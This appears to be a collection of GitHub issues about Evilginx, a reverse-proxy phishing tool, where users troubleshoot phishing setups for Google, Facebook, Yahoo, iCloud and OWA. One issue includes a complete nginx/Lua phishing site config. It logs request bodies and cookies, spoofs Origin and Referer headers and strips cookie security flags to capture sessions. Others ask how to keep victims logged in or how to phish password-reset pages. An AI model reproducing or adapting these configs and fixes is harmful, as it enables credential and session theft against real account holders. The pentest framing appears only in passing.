Issue with root@debian-s-1vcpu-1gb-nyc1-01:~/evilginx# python evilginx.py setup --enable google -d mydomain.com

js and css files showing as html

First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However I'm have a lot of trouble getting things working for a custom target. The target page is getting served when I visit the phishing domain like it should, but any CSS or JS files are not, for some reason the same login page is being served for each js or css file.
Here are my config and site.conf file

config


[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]

site.conf

log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';

server {
	listen 80;
	listen 443 ssl;
	
	server_name {{PHISH_HOSTNAME[0]}};

	ssl_certificate {{CERT_PUBLIC_PATH}};
	ssl_certificate_key {{CERT_PRIVATE_PATH}};

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
	ssl_prefer_server_ciphers on;
	ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

	if ($scheme = http) {
		return 301 https://$server_name$request_uri;
	}

	location / {
		proxy_pass https://{{TARGET_HOST[0]}};
		proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
		proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
		proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;
		
		sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
		sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
		sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
		sub_filter_once off;
		
		set $auth_token "tokenid";

		proxy_set_header Accept-Encoding "";
		proxy_set_header X-Real-IP $remote_addr;
		proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

		set_unescape_uri $redir $arg_{{REDIR_ARG}};
		set $set_cookies_all "";

		access_log /var/log/{{LOG_NAME}} site_phish;

		access_by_lua_block {
			if ngx.var.http_origin ~= nil then
				val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Origin", val)
			end

			if ngx.var.http_referer ~= nil then
				val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Referer", val)
			end

			if ngx.var.http_cookie ~= nil then
				local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
				local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

				if c_rc ~= nil and c_rd ~= nil then
					ngx.redirect(c_rc)
				end
			end
		}

		header_filter_by_lua_block {
			function get_cookies()
				local cookies = ngx.header.set_cookie or {}
				if type(cookies) == "string" then
					cookies = {cookies}
				end
				return cookies
			end

			function add_cookie(cookie)
				local cookies = get_cookies()
				table.insert(cookies, cookie)
				ngx.header.set_cookie = cookies
			end

			function exists_cookie(cookie)
				local cookies = get_cookies()
				for i, val in ipairs(cookies) do
					if string.match(val, "^" .. cookie .. "=") ~= nil then
						return true
					end
				end
				return false
			end

			ngx.header["Strict-Transport-Security"] = {}
			if ngx.var.http_origin ~= nil then
				ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
			end

			if ngx.var.redir ~= "" then
				local r_url = ngx.var.redir
				if string.sub(r_url,1,1) == '0' then
					val = string.sub(ngx.var.redir, 2)
					r_url = ngx.decode_base64(val)
				end
				add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
			end

			if ngx.header.location then
			end

			if ngx.var.http_cookie ~= nil then
				local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
				local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

				if c_rc ~= nil then
					if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
						ngx.header.location = ngx.unescape_uri(c_rc)
						add_cookie("{{SUCCESS_ARG}}=true; path=/")
					end
				end
			end
			
			if ngx.header.set_cookie then
				local cookies = ngx.header.set_cookie
				if not cookies then return end
				if type(cookies) ~= "table" then cookies = {cookies} end
				local newcookies = {}
				local allcookies = ""
				for i, val in ipairs(cookies) do
					val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
					val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
					val = string.gsub(val, '; *[sS]ecure', "")
					table.insert(newcookies, val)
					if i>1 then allcookies = allcookies .. "||" end
					allcookies = allcookies .. val
				end
				ngx.header.set_cookie = newcookies
				ngx.var.set_cookies_all = allcookies
			end
		}
	}
}

Also(this is unrelated): in the .conf files for each site, you have sub_filter_types text/html application/json;set unnecessarily, text/html is already set by default. This causes [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf warning everytime the page is requested, everything still works but the error.log gets full pretty quick.

Created URL not accessible after proper setup

Cant hit the generated url after successful setup

Now when i try to open the url , i get error site not accessible

Getting following errors for systemctl status nginx.service

Is there a way to debug this issue?

Error While Installing {parrot OS}

when i want to install the script
these Problem occur :
This script only supports Ubuntu/Debian.
it doesnt support all Debian
👍

Failed to start nginx daemon

Installing Evilginx daemon...

Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.

Then I type
nginx -t -c /etc/nginx/nginx.conf

root@loyal:~/Desktop/evilginx# nginx -t -c /etc/nginx/nginx.conf
nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" failed (/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so: cannot open shared object file: No such file or directory) in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
nginx: configuration file /etc/nginx/nginx.conf test failed

any solution? thanks anyway

icloud-evilginx not working

Here is screenshot

evilginx-google.log be truncated after tens of seconds

my mistake, I have set autoparse all log when setup,

please make sure that your domain name was entered correctly

Having an issue generating the LetsEncrypt SSL cert. I'm sure my A Record is configured correctly.

./evilginx.py setup --enable facebook -d my_website.com

IMPORTANT NOTES:
 - The following errors were reported by the server:

   Domain: my_website.com
   Type:   unauthorized
   Detail: Invalid response from
   http://my_website.com/.well-known/acme-challenge/IEf-BPDxSuxxxxxxxxxxxxxxxxxxxxx6gWIWrzrU
   [xxx.xxx.xx.xxx]: 404

   To fix these errors, please make sure that your domain name was
   entered correctly and the DNS A/AAAA record(s) for that domain
   contain(s) the right IP address.
 - The following errors were reported by the server:

   Domain: www.my_website.com
   Type:   connection
   Detail: Fetching
   http://www.my_website.com/.well-known/acme-challenge/2dw-LgiFxxxxxxxxxxxxxxxxxxxxIYP-xnCrHw:
   Error getting validation data

   Domain: m.my_website.com
   Type:   connection
   Detail: DNS problem: NXDOMAIN looking up A for m.my_website.com

   To fix these errors, please make sure that your domain name was
   entered correctly and the DNS A/AAAA record(s) for that domain
   contain(s) the right IP address. Additionally, please check that
   your computer has a publicly routable IP address and that no
   firewalls are preventing the server from communicating with the
   client. If you're using the webroot plugin, you should also verify
   that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...

When cloning the evilginx repo, should I clone it to the /var/www/ or /etc/nginx/ directory?

sites on dekstop are shown as if they were opened on a phone

Strange thing has happened to me - google works fine, but facebok opens up as if i was using my phone, i mean the site design is not for dekstops. sometimes even the links says m.facebook.com not facebook.com. how could i fix this?

set-cookies header problem

hi,
i am making a config for yahoo and have problem with set-cookies header. it is:
set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly
and as you see it have secure flag. i think library can't change domain so it pass to browser with wrong domain and can't set in cookies storage (our fake domain is e.g: fakeyahoo.com). do you have any idea?
thanks

Google: Not working on Mobile

On My PC it works seamlessly, but on my iphone, it is in a loading loop after entering the Username and hitting Next.

Special chars in username

Hello!
It's necessary to filter usernames for special chars - when "/" appears in username (for example in OWA logins) there is a problem to parse. I replaced "/" and "" to "-" in filenames.

Please consider adding "generic" OWA portal

Thanks!

Adding preissued certs

Great work on the automation! Could you add some flags to link to certificates we already have? I'd like to be able to spin everything up without using certbot and without modifying the config files manually.

password reset

Hi, Do you look at google password reset ever? i configured the myaccount sub domain and the problem is when it verify password for second time you can't get back to your domain and will redirect to their website.
In other word can we see myaccount.google.com as myaccount.fake.com and it show our username and we see that we are login.
I want after authorize see the myaccount page that say i am login. (on the fake domain.)
Regards

This script only supports Ubuntu/Debian

I'm using Kali Linux 2017.1 on VMWare and the distro is based on Debian...but it still gives this error running

# ./install.sh

i want remove rd cookies

phishing link is re-opened, how to config keep he/she will again sign-in??thanks

Nothing happens when I click next on the google page.

I have setup EvilGinx and generated the url's.
The url is - https://accounts.security-logs.com

The issue is that after entering E-Mail and clicking NEXT, nothing happens.
Please help.

TIA

Improper Domain Variable Interpretation - Causes 500 Server Error upon redirect/can't handle #'s in domain name

Hello - If I get around to it this will be a Pull request and not an issue.

When you check for special characters in the domain name, you use:
" for c in phish_host:
if not c.isalpha():
phish_hostname_esc += '%'
phish_hostname_esc += c
phish_hostnames_esc.append(phish_hostname_esc)"

You must change the isalpha():" to "isalnum()" to include numbers, otherwise the domain name will have escape characters inserted in front of every number.

[emerg] directive "server_name" is not terminated by ";"

Hey @kgretzky, I would like to feature Evilginx on Null Byte, I could use your help resolving this issue. I'm getting a ""server_name" is not terminated by ";"" error even though there are semicolon's at the ends of each directive. No errors when using the install.sh script.

VPS specs:

$ lsb_release -a

Distributor ID:	Debian
Description:	Debian GNU/Linux 9.3 (stretch)
Release:	9.3
Codename:	stretch

$ uname -a
Linux hostname 4.9.0-5-amd64 #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) x86_64 GNU/Linux

Using the following evilginx command:

$ ./evilginx.py setup --enable facebook -d mywebsite.com
	    _ _       _            
	   (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
	         __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: mywebsite.com
[*] Stopping nginx daemon...
[+] Site 'facebook' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] n
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
 - mywebsite.com
 - www.mywebsite.com
 - m.mywebsite.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Cert not yet due for renewal

You have an existing certificate that has exactly the same domains or certificate name you requested and isn't close to expiry.
(ref: /etc/letsencrypt/renewal/mywebsite.com.conf)

What would you like to do?
-------------------------------------------------------------------------------
1: Keep the existing certificate for now
2: Renew & replace the cert (limit ~5 per 7 days)
-------------------------------------------------------------------------------
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1
Keeping the existing certificate

-------------------------------------------------------------------------------
Certificate not yet due for renewal; no action taken.
-------------------------------------------------------------------------------
[+] Certificates obtained successfully.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...

There are no other server blocks in my nginx.conf:

http {
    include /root/evilginx/sites/facebook/*.conf;
    ....

Errors when starting nginx:

-- Unit nginx.service has begun starting up.
----  hostname nginx[6879]: nginx: [emerg] directive "server_name" is not terminated by ";" in /root/evilginx/sites/facebook/m.facebook.com.conf:7
----  hostname nginx[6879]: nginx: configuration file /etc/nginx/nginx.conf test failed
----  hostname systemd[1]: nginx.service: Control process exited, code=exited status=1
----  hostname systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
-- Subject: Unit nginx.service has failed

The evilginx/sites/m.facebook.com.conf:

server {
	listen 80;
	listen 443 ssl;

	server_name {{PHISH_HOSTNAME[1]}}; # line 7, server_name terminated by ;

	ssl_certificate {{CERT_PUBLIC_PATH}};
	ssl_certificate_key {{CERT_PRIVATE_PATH}};
	....

If I manually replace "{{PHISH_HOSTNAME[1]}}" with "mywebsite.com", I'll instead receive a "not terminated by ;" error for the following ssl_certificate* directives. If I delete the mobile conf and try the www conf only, Nginx complains the "{{PHISH_HOSTNAME[0]}}" line wasn't terminated properly. Any idea why this might be happening?

Google template - Victim is not being authenticated

Hello @kgretzky, first of all I want to thank you, this tool is really awesome very useful for pentest engagements.
I was testing the google template, and the cookies and credentials are stolen and work like a charm. However, I noticed that the victim is not being logged in after entering the credentials. I mean, Is being redirected to myaccounts page but is not authenticated.

I tried to troubleshoot and all the cookies seems to be OK. However the last request after authentication is performed (after sending credentials and before being redirected to myaccount.google.com), is not sending the corresponding cookies. I'm suspecting that maybe that's the reason why the victim is not being authenticated.

Is it possible that google have changed something and that's why is not working? Could you give a hand with this?

Thanks man, I would really appreciate your help.

Sites

Hello and thx for this works,
so im sorry for my english .
how to add a new website in the folder ?
What are the important elements to put to create kinds of templates?

Thx .

Masto.